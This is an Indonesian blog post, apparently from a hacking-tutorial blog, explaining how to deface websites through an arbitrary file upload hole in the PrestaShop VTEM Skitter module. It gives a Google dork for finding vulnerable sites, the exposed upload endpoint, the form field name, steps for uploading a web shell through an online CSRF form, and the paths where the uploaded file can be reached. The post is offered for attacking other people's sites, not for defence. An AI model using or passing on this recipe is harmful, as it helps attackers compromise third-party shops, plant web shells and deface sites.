Header Ads

Deface Menggunakan Prestashop VTEM Skitter Arbitrary File Upload


Pada kesempatan kali ini , gua mau share Deface Menggunakan Prestashop VTEM Skitter Arbitrary File Upload 
dah lah langsung ajh

Google Dork :  inrul:modules/vtemskitter/

Exploit : /modules/vtemskitter/uploadimage.php

CSRF online : Disini   atau Disana
isi Postname dengan = userfile

Akses file = site.com//modules/vtemskitter/img/urfile or site.com//modules/vtemskitter/slides/urfile

Step :

1. Dorking , searchnya di images/gambar saja
2. pilih salah satu gambar
3. masukan exploit di atas
4. vuln = error
5. masukkan site yg vuln tdi ke csrf , isi Postname dengan = userfile. kalo sudak klik OKe
6. upload shell lu , kalo sudah klik JOS
7. akses file liat di atas

Kalo lu msh blm paham -_- gua kasih vidionya punya si Aweu404 neh

No comments

Silahkan Komentar dengan bahasa yang sopan

Powered by Blogger.